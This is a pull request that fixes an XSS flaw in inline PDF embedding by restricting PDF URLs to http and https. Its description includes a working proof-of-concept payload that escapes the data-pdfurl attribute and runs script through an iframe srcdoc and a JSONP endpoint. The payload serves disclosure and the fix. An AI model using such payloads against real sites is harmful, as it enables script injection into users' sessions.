### PR TITLE
fix: sanitize pdf url to prevent XSS on inline PDFs

### DIFF
--- a/public/js/extra.js
+++ b/public/js/extra.js
@@ -28,6 +28,7 @@ import './lib/renderer/lightbox'
 import { renderCSVPreview } from './lib/renderer/csvpreview'
 
 import { escapeAttrValue } from './render'
+import { sanitizeUrl } from './utils'
 
 import markdownit from 'markdown-it'
 import markdownitContainer from 'markdown-it-container'
@@ -630,10 +631,11 @@ export function finishView (view) {
   view.find('div.pdf.raw').removeClass('raw')
     .each(function (key, value) {
       const url = $(value).attr('data-pdfurl')
+      const cleanUrl = sanitizeUrl(url)
       const inner = $('<div></div>')
       $(this).append(inner)
       setTimeout(() => {
-        PDFObject.embed(url, inner, {
+        PDFObject.embed(cleanUrl, inner, {
           height: '400px'
         })
       }, 1)

--- a/public/js/utils.js
+++ b/public/js/utils.js
@@ -26,3 +26,23 @@ export function decodeNoteId (encodedId) {
   idParts.push(id.substr(20, 12))
   return idParts.join('-')
 }
+
+/**
+ * sanitize url to prevent XSS
+ * @see {@link https://github.com/braintree/sanitize-url/issues/52#issue-1593777166}
+ *
+ * @param {string} rawUrl
+ * @returns {string} sanitized url
+ */
+export function sanitizeUrl (rawUrl) {
+  try {
+    const url = new URL(rawUrl)
+    if (url.protocol === 'http:' || url.protocol === 'https:') {
+      return url.toString()
+    }
+
+    throw new Error('Invalid protocol')
+  } catch (error) {
+    return 'about:blank'
+  }
+}


### PR DESCRIPTION
Hi team,

Consider the following example, which can trigger an alert popup when inline PDFs are unsupported (like on mobile devices):

```md
# XSS 6

<span class="pdf raw" data-pdfurl="'><iframe srcdoc='ww<script src=&quot;https://www.google.com/complete/search?client=chrome&q=123&jsonp=alert(document.domain)//&quot;></script>'></iframe><p data-x='"></span>
```

The issue arises because [PDFObject](https://github.com/pipwerks/PDFObject) uses `innerHTML` to insert concatenated fallbackHTML, which could lead to XSS vulnerabilities. For more information, refer to https://github.com/pipwerks/PDFObject/issues/296

This can be seen in the code at the following locations:

https://github.com/pipwerks/PDFObject/blob/2c0bbd90d4de64598ff6df9e1af32de2d58a6eb9/pdfobject.js#L275
https://github.com/pipwerks/PDFObject/blob/2c0bbd90d4de64598ff6df9e1af32de2d58a6eb9/pdfobject.js#L323-L329

I think we should sanitize the URL before passing it to `PDFObject.embed`. This approach should fix the problem.
